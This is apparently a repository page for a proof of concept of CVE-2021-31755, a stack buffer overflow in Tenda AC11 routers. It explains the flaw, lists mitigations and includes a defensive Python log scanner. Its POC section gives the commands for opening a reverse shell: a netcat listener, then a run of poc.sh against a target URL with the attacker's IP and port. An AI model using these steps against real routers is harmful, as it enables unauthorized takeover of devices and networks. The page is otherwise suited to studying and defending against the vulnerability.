POC CVE-2021-31755

The issue is a stack buffer overflow vulnerability discovered in Tenda AC11 routers, with firmware versions through 02.03.01.104_CN. This type of vulnerability, if exploited, allows attackers to execute arbitrary code on the affected device. Here’s a breakdown of this CVE based on the description:

Vulnerability Overview

  • CVE Identifier: CVE-2021-31755
  • Vulnerability Type: Stack Buffer Overflow
  • Affected Device: Tenda AC11 Router
  • Firmware Affected: Through version 02.03.01.104_CN
  • Attack Vector: A crafted POST request to the /goform/setmac endpoint

Description

This vulnerability exists due to improper handling of user input in the /goform/setmac endpoint of the Tenda AC11 firmware. The stack buffer overflow occurs when an attacker sends an excessively large payload to this endpoint in a POST request: because the application does not validate or limit the size of the input, the data overwrites adjacent memory on the stack.

When this happens, an attacker can manipulate the memory in such a way that they gain control of the instruction pointer, which allows them to execute arbitrary code on the device. The impact of such code execution ranges from complete takeover of the router (changing its settings, spying on traffic) to launching further attacks on devices connected to the network.

Exploit Details

  • Attack Method: The attacker sends a specially crafted POST request to the vulnerable /goform/setmac endpoint.
  • Required Access: The attacker would need network access to the router to exploit this vulnerability.
  • Potential Impact: Code execution, system control, and further network compromise.

Mitigation

To mitigate this vulnerability:

  1. Update Firmware: Tenda has likely released a patch to address this vulnerability in a newer version of the firmware. Users should check for updates and install the latest firmware.
  2. Restrict Access: If an update is not available or cannot be applied immediately, restrict access to the router’s management interface from untrusted networks.
  3. Use Network-Level Protections: Employ firewalls and network segmentation to limit exposure of the vulnerable router to the broader internet.
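As an added, defender-side example (not part of this repository or of Tenda's code), the following Python flags two things from request records: the attack vector described above, an oversized POST body sent to /goform/setmac, and requests to that endpoint from outside a management allowlist (mitigation 2). The record shape, the 256-byte threshold and the allowlisted networks are assumptions; the page does not state the actual buffer size.

```python
import ipaddress
import re

# Constructed sample records (not real captures); assumed shape: "<src_ip> <method> <path> <content_length>".
SAMPLE_LOG = """\
10.0.0.5 POST /goform/setmac 34
10.0.0.9 GET /goform/setmac 0
192.168.0.23 POST /goform/setmac 1843
10.0.0.5 POST /goform/SysToolReboot 12
203.0.113.7 POST /goform/setmac 60
"""

VULNERABLE_PATH = "/goform/setmac"
# Assumed threshold: a legitimate setmac body is a MAC address plus a few short fields; the page gives no buffer size.
MAX_BODY_BYTES = 256
# Assumed management allowlist (mitigation 2): only these networks may reach the router's web interface.
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

LINE_RE = re.compile(r"^(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<length>\d+)$")

def parse_line(line):
    """Return a dict for one record, or None for lines that do not match the assumed shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["length"] = int(rec["length"])
    return rec

def classify(rec, max_body=MAX_BODY_BYTES):
    """Return the reasons a record is suspicious (empty list if it looks benign)."""
    reasons = []
    if rec["method"] == "POST" and rec["path"] == VULNERABLE_PATH:
        if rec["length"] > max_body:
            reasons.append("oversized body to vulnerable endpoint")
        src = ipaddress.ip_address(rec["src"])
        if not any(src in net for net in TRUSTED_NETS):
            reasons.append("management request from outside trusted networks")
    return reasons

def find_suspicious(log_text, max_body=MAX_BODY_BYTES):
    """Scan log text; return (src, path, length, reasons) for each flagged record."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec, max_body)
        if reasons:
            hits.append((rec["src"], rec["path"], rec["length"], reasons))
    return hits
```

Run against the embedded sample, it flags the 1843-byte POST and the POST from 203.0.113.7, and leaves the short in-network requests and the GET alone.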

POC

Clone repo:

git clone https://codeberg.org/bluef1sher/poc-cve-2021-31755.git

Run a reverse shell listener:

nc -lvp local_port

Execute poc.sh:

bash poc.sh remote_url local_ip local_port

  • remote_url is the vulnerable URL
  • local_ip is the attacker machine's IP
  • local_port is the attacker machine's port

If the exploit succeeds, root access should be granted.


See also